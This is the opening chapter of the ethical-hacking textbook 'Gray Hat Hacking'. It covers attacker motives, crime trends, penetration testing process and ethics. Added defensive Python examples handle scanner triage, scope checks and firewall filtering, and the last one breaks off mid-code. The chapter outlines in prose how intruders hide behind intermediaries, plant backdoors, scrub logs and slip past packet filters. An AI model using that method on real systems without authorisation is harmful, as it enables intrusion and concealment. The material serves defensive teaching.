
CHAPTER 1

Ethics of Ethical Hacking
This book has not been compiled and written to be used as a tool by individuals who wish to carry out malicious and destructive activities. It is a tool for people who are interested in extending or perfecting their skills to defend against such attacks and damaging acts. In this chapter, we’ll discuss the following topics:

• Why you need to understand your enemy’s tactics
• Recognizing the gray areas in security
• How does this stuff relate to an ethical hacking book?
• The controversy of hacking books and classes
• Where do attackers have most of their fun?

Why You Need to Understand Your Enemy’s Tactics
Let’s go ahead and get the commonly asked questions out of the way and move on from
there.
Was this book written to teach today’s hackers how to cause damage in more effective ways?
Answer: No. Next question.
Then why in the world would you try to teach people how to cause destruction and mayhem?
Answer: You cannot properly protect yourself from threats you do not understand.
The goal is to identify and prevent destruction and mayhem, not cause it.
I don’t believe you. I think these books are only written for profits and royalties.
Answer: This book was written to actually teach security professionals what the
bad guys already know and are doing. More royalties would be nice, too, so please
buy two copies.
Still not convinced? Why do militaries all over the world study their enemies’ tactics, tools, strategies, technologies, and so forth? Because the more you know about what your enemy is up to, the better idea you have as to what protection mechanisms you need to put into place to defend yourself.

Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition
Most countries’ militaries carry out various scenario-based fighting exercises. For example, pilot units split up into the “good guys” and the “bad guys.” The bad guys use the same tactics, techniques, and methods of fighting as a specific enemy—Libya, Russia, United States, Germany, North Korea, and so on. The goal of these exercises is to allow the pilots to understand enemy attack patterns and to identify and be prepared for certain offensive actions, so they can properly react in the correct defensive manner.
This may seem like a large leap—from pilots practicing for wartime to corporations trying to practice proper information security—but it is all about what the team is trying to protect and the risks involved.
A military is trying to protect its nation and its assets. Many governments around the world have also come to understand that the same assets they have spent millions and perhaps billions of dollars to protect physically now face different types of threats. The tanks, planes, and weaponry still have to be protected from being blown up, but these same tanks, planes, and weaponry are now all run by and are dependent upon software. This software can be hacked into, compromised, or corrupted. Coordinates of where bombs are to be dropped can be changed. Individual military bases still need to be protected by surveillance and military police; this is physical security. Satellites and airplanes perform surveillance to watch for suspicious activities taking place from afar, and security police monitor the entry points in and out of the base. These types of controls are limited in monitoring all of the entry points into a military base. Because the base is so dependent upon technology and software—as every organization is today—and there are now so many communication channels present (Internet, extranets, wireless, leased lines, shared WAN lines, and so on), a different type of “security police” is required to cover and monitor all of these entry points into and out of the base.
Okay, so your corporation does not hold top security information about the tactical military troop movement through Afghanistan, you don’t have the speculative coordinates of the location of bin Laden, and you are not protecting the launch codes of nuclear bombs—does that mean you do not need to have the same concerns and countermeasures? Nope. Just as the military needs to protect its assets, you need to protect yours.
An interesting aspect of the hacker community is that it is changing. Over the last few years, their motivation has changed from just the thrill of figuring out how to exploit vulnerabilities to figuring out how to make revenue from their actions and getting paid for their skills. Hackers who were out to “have fun” without any real target in mind have, to a great extent, been replaced by people who are serious about gaining financial benefits from their activities. Attacks are not only getting more specific, but also increasing in sophistication. The following are just a few examples of this type of trend:

• One of three Indian defendants was sentenced in September 2008 for an online brokerage hack, called one of the first federal prosecutions of a “hack, pump, and dump” scheme, in which hackers penetrate online brokerage accounts, buy large shares of penny stocks to inflate the price, and then net the profits after selling shares.
• In December 2009, a Russian hacking group called the Russian Business Network (RBN) stole tens of millions of dollars from Citibank through the use of a piece of malware called “Black Energy.” According to Symantec, about half of all phishing incidents in 2008 were credited to the RBN.

• A group of Russian, Estonian, and Moldovan hackers were indicted in
November 2009, after stealing more than $9 million from a credit card
processor in one day. The hackers were alleged to have broken the encryption
scheme used at Royal Bank of Scotland’s payment processor, and then they
raised account limits, created and distributed counterfeit debit cards, and
withdrew roughly $9.4 million from more than 2,100 ATMs worldwide—in
less than 12 hours.
• Hackers using a new kind of malware made off with at least 300,000 Euros
from German banks in August of 2009. The malware wrote new bank
statements as it took money from victims’ bank accounts, changing HTML
coding on an infected machine before a user could see it.

Criminals are also using online scams in a bid to steal donations made to help
those affected by the January 2010 earthquake in Haiti and other similar disasters.
Fraudsters have set up fictitious websites or are falsely using the names of genuine
charities to trick donors into sending them donations. If you can think of the crime, it
is probably already taking place within the digital world. You can learn more about
these types of crimes at www.cybercrime.gov.
Malware is still one of the main culprits that costs companies the most amount of money. An interesting thing about malware is that many people seem to put it in a different category from hacking and intrusions. The fact is malware has evolved to become one of the most sophisticated and automated forms of hacking. The attacker only has to put some upfront effort into developing the software, and then with no more effort required from the attacker, the malware can do its damage over and over again. The commands and logic within the malware are the same components that attackers used to have to carry out manually.
Sadly, many of us have a false sense of security when it comes to malware detection. In 2006, Australia’s CERT announced that 80 percent of antivirus software products commonly missed new malware attacks because attackers test their malware software against the most popular antivirus software products in the industry to hide from detection. If you compare this type of statistic with the amount of malware that hits the Internet hourly, you can get a sense of the level of vulnerability we are actually faced with. In 2008, Symantec had to write new virus signatures every 20 seconds to keep up with the onslaught of malware that was released. This increased to every 8 seconds by 2009. As of this writing, close to 4 million malware signatures are required for antivirus software to be up to date.
The company Alinean has put together the cost estimates, per minute, for different organizations if their operations are interrupted. Even if an attack or compromise is not totally successful for the attacker (he or she does not obtain the desired asset), this in no way means that the company remains unharmed. Many times attacks and intrusions cause more of a nuisance and can negatively affect production and the normal department operations, which always correlates to costing the company more money in direct or indirect ways. These costs are shown in Table 1-1.
Business Application        Estimated Outage Cost per Minute
Supply chain management     $11,000
E-commerce                  $10,000
Customer service            $3,700
ATM/POS/EFT                 $3,500
Financial management        $1,500
Human capital management    $1,000
Messaging                   $1,000
Infrastructure              $700

Table 1-1 Downtime Losses (Source: Alinean)

A conservative estimate from Gartner pegs the average hourly cost of downtime for computer networks at $42,000. A company that suffers from worse than average downtime of 175 hours a year can lose more than $7 million per year. Even when attacks are not newsworthy enough to be reported on TV or talked about in security industry circles, they still negatively affect companies’ bottom lines.
As stated earlier, an interesting shift has taken place in the hacker community, from joy riding to hacking as an occupation. Today, potentially millions of computers are infected with bots that are controlled by specific hackers. If a hacker has infected 10,000 systems, this is her botnet, and she can use it to carry out DDoS attacks or even lease these systems to others who do not want their activities linked to their true identities or systems. (Botnets are commonly used to spread spam, phishing attacks, and pornography.) The hacker who owns and runs a botnet is referred to as a bot herder. Since more network administrators have configured their mail relays properly and blacklists have been employed to block mail relays that are open, spammers have had to change tactics (using botnets), which the hacking community has been more than willing to provide—for a price.
For example, the Zeus bot variant uses key-logging techniques to steal sensitive data such as usernames, passwords, account numbers, and credit card numbers. It injects fake HTML forms into online banking login pages to steal user data. Its botnet is estimated to consist of 3.6 million compromised computers. Zeus’s creators are linked to about $100 million in fraud in 2009 alone. Another botnet, the Koobface, is one of the most efficient social engineering–driven botnets to date. It spreads via social networking sites MySpace and Facebook with faked messages or comments from “friends.” When a user clicks a provided link to view a video, the user is prompted to obtain a necessary software update, like a CODEC—but the update is really malware that can take control of the computer. By early 2010, 2.9 million computers have knowingly been compromised. Of course, today many more computers have been compromised than has been reported.
Security Compromises and Trends

The following are a few specific examples and trends of security compromises
that are taking place today:

• A massive joint operation between U.S. and Egyptian law enforcement, called “Operation Phish Pry,” netted 100 accused defendants. The two-year investigation led to the October 2009 indictment of both American and Egyptian hackers who allegedly worked in both countries to hack into American bank systems, after using phishing lures to collect individual bank account information.
• Social networking site Twitter was the target of several attacks in 2009,
one of which shut service down for more than 30 million users. The
DoS attack that shut the site down also interrupted access to Facebook
and LinkedIn, affecting approximately 300 million users in total.
• Attackers maintaining the Zeus botnet broke into Amazon’s EC2
cloud computing service in December 2009, even after Amazon’s
service had received praise for its safety and performance. The virus
that was used acquired authentication credentials from an infected
computer, accessed one of the websites hosted on an Amazon server,
and connected to the Amazon cloud to install a command and control
infrastructure on the client grid. The high-performance platform let the
virus quickly broadcast commands across the network.
• In December 2009, a hacker posted an online-banking phishing
application in the open source, mobile phone operating system
Android. The fake software showed up in the application store, used
by a variety of phone companies, including Google’s Nexus One
phone. Once users downloaded the software, they entered personal
information into the application, which was designed to look like it
came from specific credit unions.
• Iraqi insurgents intercepted live video feeds from U.S. Predator drones
in 2008 and 2009. Shiite fighters attacked some nonsecure links in
drone systems, allowing them to see where U.S. surveillance was taking
place and other military operations. It is reported that the hackers used
cheap software available online to break into the drones’ systems.
• In early 2010, Google announced it was considering pulling its search
engine from China, in part because of rampant China-based hacker
attacks, which used malware and phishing to penetrate the Gmail
accounts of human rights activists.
Some hackers also create and sell zero-day attacks. A zero-day attack is one for which there is currently no fix available, and whoever is running the particular software that contains that exploitable vulnerability is exposed with little or no protection. The code for these types of attacks is advertised on special websites and sold to other hackers or organized crime rings.

References
Alinean, www.alinean.com/
Computer Crime & Intellectual Property Section, United States Department of Justice, www.cybercrime.gov
Federal Trade Commission, Identity Theft Site, http://www.ftc.gov/bcp/edu/microsites/idtheft/
Infonetics Research, www.infonetics.com
Privacy Rights Clearinghouse, Chronology of Data Breaches, Security Breaches 2005-Present, www.privacyrights.org/ar/ChronDataBreaches.htm#CP
Robot Wars: How Botnets Work (Massimiliano Romano, Simone Rosignoli, and Ennio Giannini for hakin9), www.windowsecurity.com/articles/Robot-Wars-How-Botnets-Work.html
Zero-Day Attack Prevention, http://searchwindowssecurity.techtarget.com/generic/0,295582,sid45_gci1230354,00.html

Recognizing the Gray Areas in Security

Since technology can be used by the good and bad guys, there is always a fine line that separates the two. For example, BitTorrent is a peer-to-peer file sharing protocol that allows individuals all over the world to share files whether they are the legal owners or not. One website will have the metadata of the files that are being offered up, but instead of the files being available on that site’s web farm, the files are located on the user’s system who is offering up the files. This distributed approach ensures that one web server farm is not overwhelmed with file requests, but it also makes it harder to track down those who are offering up illegal material.
Various publishers and owners of copyrighted material have used legal means to
persuade sites that maintain such material to honor the copyrights. The fine line is that
sites that use the BitTorrent protocol are like windows for all the material others are
offering to the world; they don’t actually host this material on their physical servers. So
are they legally responsible for offering and spreading illegal content?
The entities that offer up files to be shared on a peer-to-peer sharing site are referred to as BitTorrent trackers. Organizations such as Suprnova.org, TorrentSpy, LokiTorrent, and Mininova are some of the BitTorrent trackers that have been sued and brought offline for their illegal distribution of copyrighted material. The problem is that many of these entities just pop up on some other BitTorrent site a few days later. BitTorrent is a common example of a technology that can be used for good and evil purposes.
Another common gray area in web-based technology is search engine optimization (SEO). Today, all organizations and individuals want to be at the top of each search engine result to get as much exposure as possible. Many simple to sophisticated ways are available for carrying out the necessary tasks to climb to the top. The proper methods are to release metadata that directly relates to content on your site, update your content regularly, and create legal links and backlinks to other sites, etc. But, for every legitimate way of working with search engine algorithms, there are ten illegitimate ways. Spamdexing offers a long list of ways to fool search engines into getting a specific site up the ladder in a search engine listing. Then there’s keyword stuffing, in which a malicious hacker or “black hat” will place hidden text within a page. For example, if Bob has a website that carries out a phishing attack, he might insert hidden text within his page that targets elderly people to help drive these types of victims to his site.
There are scraper sites that take (scrape) content from another website without authorization. The malicious site will make this stolen content unique enough that it shows up as new content on the Web, thus fooling the search engine into giving it a higher ranking. These sites commonly contain mostly advertisements and links back to the original sites.
There are several other ways of manipulating search engine algorithms as well, for
instance, creating link farms, hidden links, fake blogs, page hijacking, and so on. The
crux here is that some of these activities are the right way of doing things and some of
them are the wrong way of doing things. Our laws have not necessarily caught up with
defining what is legal and illegal all the way down to SEO algorithm activities.

NOTE We go into laws and legal issues pertaining to various hacking activities in Chapter 2.

There are multiple instances of the controversial concept of hacktivism. Both legal and illegal methods can be used to portray political ideology. Is it right to try and influence social change through the use of technology? Is web defacement covered under freedom of speech? Is it wrong to carry out a virtual “sit in” on a site that provides illegal content? During the 2009 Iran elections, was it unethical for an individual to set up a site that showed upheaval about the potential corrupt government elections? When Israel invaded Gaza, there were many website defacements, DoS attacks, and website hijackings. The claim of what is ethical versus not ethical probably depends upon which side the individuals making these calls reside.
How Does This Stuff Relate to an Ethical Hacking Book?
Corporations and individuals need to understand how the damage is being done so they understand how to stop it. Corporations also need to understand the extent of the threat that a vulnerability represents. Let’s take a very simplistic example. The company FalseSenseOfSecurity, Inc., may allow its employees to share directories, files, and whole hard drives. This is done so that others can quickly and easily access data as needed. The company may understand that this practice could possibly put the files and systems at risk, but they only allow employees to have unclassified files on their computers, so the company is not overly concerned. The real security threat, which is something that should be uncovered by an ethical hacker, is if an attacker can use this file-sharing service as access into a computer itself. Once this computer is compromised, the attacker will most likely plant a backdoor and work on accessing another, more critical system via the compromised system.
The vast amount of functionality that is provided by an organization’s networking, database, and desktop software can be used against them. Within each and every organization, there is the all-too-familiar battle of functionality vs. security. This is the reason that, in most environments, the security officer is not the most well-liked individual in the company. Security officers are in charge of ensuring the overall security of the environment, which usually means reducing or shutting off many functionalities that users love. Telling people that they cannot access social media sites, open attachments, use applets or JavaScript via e-mail, or plug in their mobile devices to a network-connected system and making them attend security awareness training does not usually get you invited to the Friday night get-togethers at the bar. Instead, these people are often called “Security Nazi” or “Mr. No” behind their backs. They are responsible for the balance between functionality and security within the company, and it is a hard job.
The ethical hacker’s job is to find these things running on systems and networks,
and he needs to have the skill set to know how an enemy would use these things against
the organization. This work is referred to as a penetration test, which is different from
a vulnerability assessment, which we’ll discuss first.

Vulnerability Assessment
A vulnerability assessment is usually carried out by a network scanner on steroids. Some type of automated scanning product is used to probe the ports and services on a range of IP addresses. Most of these products can also test for the type of operating system and application software running and the versions, patch levels, user accounts, and services that are also running. These findings are matched up with correlating vulnerabilities in the product’s database. The end result is a large pile of reports that provides a list of each system’s vulnerabilities and corresponding countermeasures to mitigate the associated risks. Basically, the tool states, “Here is a list of your vulnerabilities and here is a list of things you need to do to fix them.”
To the novice, this sounds like an open and shut case and an easy stroll into network utopia where all of the scary entities can be kept out. This false utopia, unfortunately, is created by not understanding the complexity of information security. The problem with just depending upon this large pile of printouts is that it was generated by an automated tool that has a hard time putting its findings into the proper context of the given environment. For example, several of these tools provide an alert of “High” for vulnerabilities that do not have a highly probable threat associated with them. The tools also cannot understand how a small, seemingly insignificant, vulnerability can be used in a large orchestrated attack.
Vulnerability assessments are great for identifying the foundational security issues
within an environment, but many times, it takes an ethical hacker to really test and
qualify the level of risk specific vulnerabilities pose.
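The contextual triage this section argues for can be made concrete. The Python below is an added example and is not from the book or from any scanner vendor: it takes constructed scanner findings and a constructed asset inventory and re-rates each finding by whether the host is reachable from the Internet, how critical the asset is, which compensating controls exist, and whether a low-severity finding chains with another finding on the same host. The hosts, check names and rating rules are all constructed for illustration; the point is the shape of the reasoning a scanner cannot do on its own.

```python
"""Context-aware re-rating of automated scanner findings.

Added example, not from the book. Every host, check name and rule below is
constructed; a real inventory and rule set would come from the organization.
"""
from dataclasses import dataclass

SEVERITY = {"Low": 1, "Medium": 2, "High": 3, "Critical": 4}
LABEL = {v: k for k, v in SEVERITY.items()}


@dataclass
class Asset:
    host: str
    internet_facing: bool
    criticality: str                      # "low", "medium" or "high"
    controls: frozenset = frozenset()     # compensating controls in place


@dataclass
class Finding:
    host: str
    port: int
    check: str                            # scanner check name (constructed)
    tool_severity: str                    # what the scanner reported


# Constructed asset inventory: the context the scanner does not have.
ASSETS = {
    "web01": Asset("web01", True, "high", frozenset({"waf"})),
    "dev-build": Asset("dev-build", False, "medium"),
    "hr-db": Asset("hr-db", False, "high", frozenset({"mfa"})),
}

# Constructed scanner output, as it would appear in the report.
FINDINGS = [
    Finding("web01", 443, "outdated-software", "Medium"),
    Finding("web01", 443, "version-disclosure", "Low"),
    Finding("dev-build", 22, "default-credentials", "High"),
    Finding("hr-db", 1433, "weak-password-policy", "High"),
    Finding("dev-build", 8080, "version-disclosure", "Low"),
]

CREDENTIAL_CHECKS = {"default-credentials", "weak-password-policy"}


def contextual_rating(finding, asset, host_findings):
    """Return (label, reasons) for one finding given its asset context."""
    score = SEVERITY[finding.tool_severity]
    reasons = []
    if not asset.internet_facing:
        score -= 1
        reasons.append("internal only: attacker needs a foothold first")
    if asset.criticality == "high" and score >= SEVERITY["Medium"]:
        score += 1
        reasons.append("high-criticality asset")
    if "mfa" in asset.controls and finding.check in CREDENTIAL_CHECKS:
        score -= 1
        reasons.append("MFA limits what a guessed or stolen password buys")
    # Chaining: a harmless-looking version banner on an Internet-facing host
    # tells an attacker exactly which outdated software to go after.
    if (finding.check == "version-disclosure" and asset.internet_facing
            and any(o.check == "outdated-software" for o in host_findings)):
        score += 1
        reasons.append("chains with outdated-software on the same host")
    score = max(SEVERITY["Low"], min(SEVERITY["Critical"], score))
    return LABEL[score], reasons


def rerate(findings, assets):
    """Re-rate every finding and sort by the contextual rating, highest first."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, []).append(f)
    rows = []
    for f in findings:
        label, reasons = contextual_rating(f, assets[f.host], by_host[f.host])
        rows.append((f.host, f.port, f.check, f.tool_severity, label, reasons))
    rows.sort(key=lambda r: SEVERITY[r[4]], reverse=True)
    return rows


if __name__ == "__main__":
    for host, port, check, tool, ctx, reasons in rerate(FINDINGS, ASSETS):
        print(f"{host}:{port} {check}: tool={tool} context={ctx} "
              f"({'; '.join(reasons)})")
```

Run as a script it prints the re-rated list; the interesting rows are the internal "High" default-credentials finding that drops to Medium, and the web server's "Low" version banner that rises to Medium because the same host is running outdated software.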

Penetration Testing
A penetration test is when ethical hackers do their magic. They can test many of the vulnerabilities identified during the vulnerability assessment to quantify the actual threat and risk posed by the vulnerability.
When ethical hackers are carrying out a penetration test, their ultimate goal is usually to break into a system and hop from system to system until they “own” the domain or environment. They own the domain or environment when they either have root privileges on the most critical Unix or Linux system or own the domain administrator account that can access and control all of the resources on the network. They do this to show the customer (company) what an actual attacker can do under the circumstances and current security posture of the network.
Many times, while the ethical hacker is carrying out her procedures to gain total control of the network, she will pick up significant trophies along the way. These trophies can include the CEO’s passwords, company trade-secret documentation, administrative passwords to all border routers, documents marked “confidential” held on the CFO’s and CIO’s laptops, or the combination to the company vault. The reason these trophies are collected along the way is so the decision makers understand the ramifications of these vulnerabilities. A security professional can go on for hours to the CEO, CIO, or COO about services, open ports, misconfigurations, and hacker potential without making a point that this audience would understand or care about. But as soon as you show the CFO his next year’s projections, or show the CIO all of the blueprints to the next year’s product line, or tell the CEO that his password is “IAmWearingPanties,” they will all want to learn more about the importance of a firewall and other countermeasures that should be put into place.

CAUTION No security professional should ever try to embarrass a customer or make them feel inadequate for their lack of security. This is why the security professional has been invited into the environment. He is a guest and is there to help solve the problem, not point fingers. Also, in most cases, any sensitive data should not be read by the penetration team because of the possibilities of future lawsuits pertaining to the use of confidential information.
The goal of a vulnerability test is to provide a listing of all of the vulnerabilities within a network. The goal of a penetration test is to show the company how these vulnerabilities can be used against it by attackers. From here, the security professional (ethical hacker) provides advice on the necessary countermeasures that should be implemented to reduce the threats of these vulnerabilities individually and collectively. In this book, we will cover advanced vulnerability tools and methods as well as sophisticated penetration techniques. Then we’ll dig into the programming code to show you how skilled attackers identify vulnerabilities and develop new tools to exploit their findings.
Let’s take a look at the ethical penetration testing process and see how it differs from
that of unethical hacker activities.

The Penetration Testing Process

1. Form two or three teams:
• Red team—The attack team
• White team—Network administration, the victim
• Blue team—Management coordinating and overseeing the test (optional)
2. Establish the ground rules:
• Testing objectives
• What to attack, what is hands-off
• Who knows what about the other team (Are both teams aware of the other? Is the testing single blind or double blind?)
• Start and stop dates
• Legal issues
   • Just because a client asks for it, doesn’t mean that it’s legal.
   • The ethical hacker must know the relevant local, state, and federal laws and how they pertain to testing procedures.
• Confidentiality/Nondisclosure
• Reporting requirements
• Formalized approval and written agreement with signatures and contact information
   • Keep this document handy during the testing. It may be needed as a “get out of jail free” card.
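The ground rules above (what to attack, what is hands-off, start and stop dates) can be enforced mechanically before anything is sent to a target, and the decisions logged for the report. The Python below is an added example and is not from the book: it encodes a constructed rules-of-engagement record and checks each candidate target against it, with the time window checked first and hands-off ranges taking precedence over in-scope ranges. The addresses come from the RFC 5737 documentation ranges; the dates, the hands-off range and the approver are constructed.

```python
"""Rules-of-engagement scope check for a penetration test.

Added example, not from the book. The ROE record below is constructed;
in practice it is transcribed from the signed, approved agreement.
"""
import ipaddress
from datetime import datetime

# Constructed rules of engagement. Addresses are RFC 5737 documentation
# ranges; dates, hands-off range and approver are made up for the example.
ROE = {
    "in_scope": ["203.0.113.0/24", "198.51.100.10"],
    "hands_off": ["203.0.113.250/31"],          # e.g. a production PBX pair
    "start": "2010-03-01T09:00:00+00:00",
    "stop": "2010-03-05T18:00:00+00:00",
    "approved_by": "CISO (contact details on the signed agreement)",
}


def _networks(cidrs):
    """Parse CIDR strings or single addresses into network objects."""
    return [ipaddress.ip_network(c, strict=False) for c in cidrs]


def _as_time(when):
    """Accept either an ISO 8601 string with offset or an aware datetime."""
    return datetime.fromisoformat(when) if isinstance(when, str) else when


def check_target(ip, when, roe=ROE):
    """Return (allowed, reason) for touching `ip` at time `when`.

    Order matters: the time window is checked first, then explicit
    hands-off ranges (which override any in-scope range), then scope.
    """
    addr = ipaddress.ip_address(ip)
    now = _as_time(when)
    start, stop = _as_time(roe["start"]), _as_time(roe["stop"])
    if not (start <= now <= stop):
        return False, "outside the agreed testing window"
    if any(addr in net for net in _networks(roe["hands_off"])):
        return False, "explicitly hands-off"
    if not any(addr in net for net in _networks(roe["in_scope"])):
        return False, "not in scope"
    return True, "in scope"


def audit_line(ip, when, roe=ROE):
    """One line for the test log (step 10, documentation and reporting)."""
    allowed, reason = check_target(ip, when, roe)
    verdict = "ALLOW" if allowed else "DENY"
    return f"{_as_time(when).isoformat()} {ip} {verdict} ({reason})"


if __name__ == "__main__":
    during = "2010-03-02T12:00:00+00:00"
    for target in ["203.0.113.7", "203.0.113.251", "192.0.2.1", "198.51.100.10"]:
        print(audit_line(target, during))
    print(audit_line("203.0.113.7", "2010-03-06T09:00:00+00:00"))
```

Note that 203.0.113.251 sits inside the in-scope /24 but is denied because the hands-off check runs first; that ordering is the whole point of writing the hands-off list down separately rather than carving it out of the scope by hand.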

Penetration Testing Activities

3. Passive scanning Gather as much information about the target as possible while maintaining zero contact between the penetration tester and the target. Passive scanning can include interrogating:
• The company’s website and source code
• Social networking sites
• Whois database
• Edgar database
• Newsgroups
• ARIN, RIPE, APNIC, LACNIC databases
• Google, Monster.com, etc.
• Dumpster diving
4. Active scanning Probe the target’s public exposure with scanning tools,
which might include:
• Commercial scanning tools
• Banner grabbing
• Social engineering
• War dialing
• DNS zone transfers
• Sniffing traffic
• Wireless war driving
5. Attack surface enumeration Probe the target network to identify,
enumerate, and document each exposed device:
• Network mapping
• Router and switch locations
• Perimeter firewalls
• LAN, MAN, and WAN connections
6. Fingerprinting Perform a thorough probe of the target systems to identify:
• Operating system type and patch level
• Applications and patch level
• Open ports
• Running services
• User accounts
7. Target system selection Identify the most useful target(s).
8. Exploiting the uncovered vulnerabilities Execute the appropriate attack
tools targeted at the suspected exposures.
• Some may not work.
• Some may kill services or even kill the server.
• Some may be successful.
9. Escalation of privilege Escalate the security context so the ethical hacker has
more control.
• Gaining root or administrative rights
• Using cracked password for unauthorized access
• Carrying out buffer overflow to gain local versus remote control
10. Documentation and reporting Document everything found, how it was
found, the tools that were used, vulnerabilities that were exploited, the
timeline of activities, and successes, etc.

NOTE A more detailed approach to penetration methodology is presented in Chapter 5.

What Would an Unethical Hacker Do Differently?

1. Target selection
• Motivations would be due to a grudge or for fun or profit.
• There are no ground rules, no hands-off targets, and the white team is
definitely blind to the upcoming attack.
2. Intermediaries
• The attacker launches his attack from a different system (intermediary) than
his own to make tracking back to him more difficult in case the attack is
detected.
• There may be several layers of intermediaries between the attacker and the
victim.
• Intermediaries are often victims of the attacker as well.
3. Next the attacker will proceed with penetration testing steps described
previously.
• Passive scanning
• Active scanning
• Footprinting
• Target system selection
• Fingerprinting
• Exploiting the uncovered vulnerabilities
• Escalation of privilege
4. Preserving access
• This involves uploading and installing a rootkit, backdoor, Trojan’ed
applications, and/or bots to assure that the attacker can regain access at
a later time.
5. Covering his tracks
• Scrubbing event and audit logs
• Hiding uploaded files
• Hiding the active processes that allow the attacker to regain access
• Disabling messages to security software and system logs to hide malicious
processes and actions
6. Hardening the system
• After taking ownership of a system, an attacker may fix the open
vulnerabilities so no other attacker can use the system for other purposes.

How the attacker uses the compromised systems depends upon what his overall
goals are, which could include stealing sensitive information, redirecting financial
transactions, adding the systems to his bot network, extorting a company, etc.
The crux is that ethical and unethical hackers carry out basically the same activities
only with different intentions. If the ethical hacker does not identify the hole in the
defenses first, the unethical hacker will surely slip in and make himself at home.

The Controversy of Hacking Books and Classes


When books on hacking first came out, a big controversy arose pertaining to whether
this was the right thing to do or not. One side said that such books only increased
the attackers’ skills and techniques and created new attackers. The other side stated
that the attackers already had these skills, and these books were written to bring the
security professionals and networking individuals up to speed. Who was right? They
both were.
The word “hacking” is sexy, exciting, seemingly seedy, and usually brings about
thoughts of complex technical activities, sophisticated crimes, and a look into the face
of electronic danger itself. Although some computer crimes may take on some of these
aspects, in reality it is not this grand or romantic. A computer is just a new tool to carry
out old crimes.
Attackers are only one component of information security. Unfortunately, when most people think of security, their minds go right to packets, firewalls, and hackers. Security is a much larger and more complex beast than these technical items. Real security includes policies and procedures, liabilities and laws, human behavior patterns, corporate security programs and implementation, and yes, the technical aspects—firewalls, intrusion detection systems, proxies, encryption, antivirus software, hacks, cracks, and attacks.
Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition
Understanding how different types of hacking tools are used and how certain attacks are carried out is just one piece of the puzzle. But like all pieces of a puzzle, it is a very important one. For example, if a network administrator implements a packet filtering firewall and sets up the necessary configurations, he may feel the company is now safe and sound. He has configured his access control lists to allow only “established” traffic into the network. This means an outside source cannot send a SYN packet to initiate communication with an inside system. If the administrator does not realize that there are tools that allow for ACK packets to be generated and sent, he is only seeing part of the picture here. This lack of knowledge and experience allows for a false sense of security, which seems to be pretty common in companies around the world today.
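To make the “established” distinction concrete, here is an added example (not from the book) that models a stateless ACL line beside a minimal stateful connection tracker and runs both over the same constructed packet sequence; the addresses, ports and flag sets are made up for the example, and the ACL model follows the common “established” keyword semantics (ACK or RST bit set).

```python
"""Added example (not from the book): a stateless "established" ACL versus a
minimal stateful connection tracker.  All packets below are constructed."""
from dataclasses import dataclass
from typing import FrozenSet, List, Tuple

INSIDE_PREFIX = "10.0.0."          # constructed: addresses of the protected network


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: FrozenSet[str]          # subset of {"SYN", "ACK", "FIN", "RST"}


def is_inside(ip: str) -> bool:
    return ip.startswith(INSIDE_PREFIX)


def stateless_established_acl(pkt: Packet) -> bool:
    """Model of an inbound ACL line using the 'established' keyword.

    The keyword only inspects flag bits: a packet "looks established" when ACK
    or RST is set.  It keeps no memory of any handshake, so a crafted ACK aimed
    at a host that never sent a SYN is indistinguishable from real reply traffic.
    """
    if is_inside(pkt.src):
        return True                # outbound traffic is not filtered by this line
    return "ACK" in pkt.flags or "RST" in pkt.flags


class StatefulFilter:
    """Minimal connection tracker: inbound packets are admitted only when they
    belong to a connection an inside host opened (SYN -> SYN/ACK -> ACK)."""

    def __init__(self) -> None:
        self.half_open: set = set()      # (inside_ip, sport, outside_ip, dport) after SYN out
        self.established: set = set()

    def allow(self, pkt: Packet) -> bool:
        if is_inside(pkt.src):
            key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
            if pkt.flags == frozenset({"SYN"}):
                self.half_open.add(key)             # inside host opens a connection
                return True
            if key in self.half_open and "ACK" in pkt.flags:
                self.half_open.discard(key)         # third step of the handshake
                self.established.add(key)
                return True
            return key in self.established
        # Inbound: map the packet back to the outbound-initiated connection.
        key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if key in self.half_open and pkt.flags == frozenset({"SYN", "ACK"}):
            return True
        return key in self.established            # anything else is dropped


def compare(packets: List[Tuple[str, Packet]]) -> List[Tuple[str, bool, bool]]:
    """Run one packet sequence through both filters; returns (label, acl, stateful)."""
    tracker = StatefulFilter()
    return [(label, stateless_established_acl(p), tracker.allow(p)) for label, p in packets]


# Constructed sample traffic: one legitimate outbound session, then two probes.
SAMPLE: List[Tuple[str, Packet]] = [
    ("inside host sends SYN",      Packet("10.0.0.5", 40000, "203.0.113.9", 80, frozenset({"SYN"}))),
    ("server replies SYN/ACK",     Packet("203.0.113.9", 80, "10.0.0.5", 40000, frozenset({"SYN", "ACK"}))),
    ("inside host sends ACK",      Packet("10.0.0.5", 40000, "203.0.113.9", 80, frozenset({"ACK"}))),
    ("server sends data",          Packet("203.0.113.9", 80, "10.0.0.5", 40000, frozenset({"ACK"}))),
    ("unsolicited ACK to port 22", Packet("198.51.100.7", 4444, "10.0.0.22", 22, frozenset({"ACK"}))),
    ("unsolicited SYN to port 22", Packet("198.51.100.7", 4444, "10.0.0.22", 22, frozenset({"SYN"}))),
]

if __name__ == "__main__":
    for label, acl, stateful in compare(SAMPLE):
        acl_s = "pass" if acl else "drop"
        st_s = "pass" if stateful else "drop"
        print(f"{label:28s} established-ACL={acl_s:4s} stateful={st_s}")
```

Only the unsolicited ACK separates the two filters: the stateless line passes it because the ACK bit is set, while the tracker drops it because no inside host ever opened that connection.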
Let’s look at another example. A network engineer configures a firewall to review only the first fragment of a packet and not the packet fragments that follow. The engineer knows that this type of “cut through” configuration will increase network performance. But if she is not aware that there are tools that can create fragments with dangerous payloads, she could be allowing in malicious traffic. Once these fragments reach the inside destination system and are reassembled, the packet can be put back together and initiate an attack.
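The fragment problem, as an added example (not from the book): a filter that inspects only the first fragment is compared with one that reassembles the datagram before inspecting it. The fragment model is deliberately simplified (byte offsets rather than 8-byte units, no overlap handling), and the fragments and the content signature are constructed for the example.

```python
"""Added example (not from the book): first-fragment-only inspection versus
reassemble-then-inspect.  Simplified fragment model; all data is constructed."""
from dataclasses import dataclass
from typing import Dict, List, Optional

SIGNATURE = b"BAD-PATTERN"         # constructed stand-in for a content signature


@dataclass(frozen=True)
class Fragment:
    ident: int       # IP identification field shared by all fragments of one datagram
    offset: int      # byte offset of this payload within the original datagram
    more: bool       # "more fragments" flag; False on the last fragment
    payload: bytes


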